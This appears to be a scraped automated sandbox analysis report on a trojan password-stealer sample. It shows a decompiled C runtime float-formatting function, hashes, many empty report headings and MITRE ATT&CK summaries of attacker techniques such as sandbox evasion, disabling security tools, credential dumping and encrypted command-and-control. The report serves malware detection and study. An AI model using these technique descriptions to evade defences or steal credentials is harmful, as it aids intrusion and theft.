Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004134DB, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x004134e0
0x004134e6
0x00413559
0x00000000
0x004134ed
0x004134ed
0x004134f0
0x0041350b
0x0041350e
0x0041352e
0x00413540
0x00413510
0x00413510
0x00413513
0x00000000
0x00413515
0x00413527
0x00413527
0x00413513
0x0041355e
0x00413562
0x004134f2
0x0041350a
0x0041350a
0x004134f0

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.25862

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Function 004019F0, Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Function 004018F0, Relevance: 6.3, APIs: 5, Instructions: 77
stringCOMMON

Function 0040AF66, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Function 0040E7EE, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Function 0040D534, Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Function 0040EA0A, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Function 004104E0, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre